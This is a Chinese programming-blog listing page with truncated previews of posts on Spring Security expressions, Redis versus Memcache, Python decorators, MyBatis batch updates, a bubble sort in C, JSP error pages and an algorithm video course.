    使用 Spring 表达式语言配置访问控制,要实现这一功能的直接方式是在<http>配置元素上添加 use-expressions 属性:   <http auto-config="true" use-expressions="true"> 这样就会在投票器中自动增加一个投票器:org.springframework
  • Redis vs Memcache IXHONG redis
    1. Redis中,并不是所有的数据都一直存储在内存中的,这是和Memcached相比一个最大的区别。 2. Redis不仅仅支持简单的k/v类型的数据,同时还提供list,set,hash等数据结构的存储。 3. Redis支持数据的备份,即master-slave模式的数据备份。 4. Redis支持数据的持久化,可以将内存中的数据保持在磁盘中,重启的时候可以再次加载进行使用。 Red
  • Python - 装饰器使用过程中的误区解读 kvhur JavaScriptjqueryhtml5css
    大家都知道装饰器是一个很著名的设计模式,经常被用于AOP(面向切面编程)的场景,较为经典的有插入日志,性能测试,事务处理,Web权限校验, Cache等。 原文链接:http://www.gbtags.com/gb/share/5563.htm Python语言本身提供了装饰器语法(@),典型的装饰器实现如下:   @function_wrapper de
  • 架构师之mybatis-----update 带case when 针对多种情况更新 nannan408 case when
    1.前言.    如题. 2. 代码.   <update id="batchUpdate" parameterType="java.util.List"> <foreach collection="list" item="list" index=&
  • Algorithm算法视频教程 栏目记者 Algorithm算法
    课程:Algorithm算法视频教程 百度网盘下载地址: http://pan.baidu.com/s/1qWFjjQW 密码: 2mji 程序写的好不好,还得看算法屌不屌!Algorithm算法博大精深。 一、课程内容: 课时1、算法的基本概念 + Sequential search 课时2、Binary search 课时3、Hash table 课时4、Algor
  • C语言算法之冒泡排序 qiufeihu c算法
    任意输入10个数字由小到大进行排序。 代码: #include <stdio.h> int main() { int i,j,t,a[11]; /*定义变量及数组为基本类型*/ for(i = 1;i < 11;i++){ scanf("%d",&a[i]); /*从键盘中输入10个数*/ } for
  • JSP异常处理 wyzuomumu Webjsp
    1.在可能发生异常的网页中通过指令将HTTP请求转发给另一个专门处理异常的网页中: <%@ page errorPage="errors.jsp"%>   2.在处理异常的网页中做如下声明: errors.jsp: <%@ page isErrorPage="true"%>,这样设置完后就可以在网页中直接访问exc
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他